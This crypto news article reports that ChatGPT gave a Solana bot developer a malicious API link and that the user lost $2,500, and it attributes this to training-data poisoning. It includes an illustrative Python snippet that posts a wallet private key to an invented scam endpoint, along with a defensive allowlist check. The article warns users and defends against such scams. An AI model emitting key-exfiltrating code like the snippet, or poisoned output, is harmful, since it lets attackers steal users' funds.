Solana Exploit Reveals Risks of AI-Generated Code

  • A user lost $2,500 after using AI to code on Solana. 
  • ChatGPT provided a malicious API link.
  • The incident shows the risks of AI-generated code. 

Artificial intelligence (AI) is rapidly changing how people work, including how they program. AI's ability to generate code is seen as a way to streamline developers' work and even enable non-developers to build applications. However, AI-generated code also carries risks.

A recent incident, reportedly the first of its kind in crypto, revealed those risks firsthand: one user lost $2,500 after ChatGPT served malicious code for his Solana application.

AI-Generated Code Leads to Solana Wallet Exploit

The incident highlighted the dangers of AI-generated code in crypto. On November 21, a user reported losing $2,500 after working on a bot for Solana’s Pump.fun platform. The issue arose when ChatGPT gave the user malicious code.

The user asked ChatGPT for help with the code. However, the AI model provided a malicious API link that pointed to a scam website. After the user submitted his private key to the API, the attackers quickly drained the wallet of its assets, including SOL and USDC.
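The exact code served to the user has not been published, so the snippet below is only a hypothetical sketch of the pattern the report describes: the endpoint URL, function name, and payload are invented for illustration. The red flag is a "helper" API that asks for the private key itself; legitimate Solana RPC endpoints and trading APIs only ever need a public address or an already-signed transaction.

```python
import requests  # third-party HTTP client: pip install requests

# Hypothetical values for illustration only.
PRIVATE_KEY = "<base58-encoded Solana private key>"  # secret that must never leave the machine
FAKE_API_URL = "https://pumpfun-helper.example-scam.invalid/create-bot"  # invented scam endpoint

def create_pump_bot(private_key: str) -> dict:
    # Anti-pattern: posting the private key to a remote server hands full
    # control of the wallet to whoever operates that server.
    response = requests.post(FAKE_API_URL, json={"private_key": private_key}, timeout=10)
    return response.json()
```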

Following the incident, the user flagged the attacker’s wallet and reported the malicious code repository, expressing hope that it would be removed soon.

AI Poisoning Likely Culprit

Security experts later analyzed what happened. Yu Xian, founder of the security firm SlowMist, suggested that the user had been playing around with AI-generated code without verifying it.

He pointed to AI poisoning as the likely explanation for the incident. AI poisoning is the deliberate attempt to insert malicious code into an AI model’s training data, for example through compromised or malicious repositories, and it is a growing risk for AI users.

The incident reveals the dangers of trusting AI-generated code without independently verifying it. While AI can make coding more accessible, developers should review generated code, especially anything that handles private keys or funds, before running it.

On the Flipside

  • AI poisoning could undermine trust in tools like ChatGPT, especially for coding. 
  • LLMs can provide inaccurate information even in tasks other than coding, which introduces risks for users. 

Why This Matters

The exploit reveals the risks of using AI-generated code in crypto, especially for inexperienced users. Users should verify the critical parts of generated code, above all any external API endpoints and anything that touches private keys, before running it.
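One practical check, sketched below under the assumption of a hand-maintained allowlist, is to confirm that every endpoint found in generated code uses HTTPS and points at a host you recognize before the code ever touches a key. The helper name and host list are illustrative, not an official Solana mechanism.

```python
from urllib.parse import urlparse

# Illustrative allowlist; extend it only with endpoints you have verified yourself.
TRUSTED_HOSTS = {
    "api.mainnet-beta.solana.com",  # public Solana mainnet RPC
    "api.devnet.solana.com",        # public Solana devnet RPC
}

def is_trusted_endpoint(url: str) -> bool:
    """Return True only for HTTPS URLs whose host is on the allowlist."""
    parsed = urlparse(url)
    return parsed.scheme == "https" and parsed.hostname in TRUSTED_HOSTS

# Reject unknown hosts found in generated code before sending anything to them.
for endpoint in ("https://api.mainnet-beta.solana.com",
                 "https://pumpfun-helper.example-scam.invalid/create-bot"):
    print(endpoint, "->", "trusted" if is_trusted_endpoint(endpoint) else "DO NOT USE")
```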

Read more about crypto hacks: 
12 Biggest Hacks in Crypto Exchange History

Read more about Solana’s latest performance: 
Solana’s All-Time High Gives Whales Millions in Profits




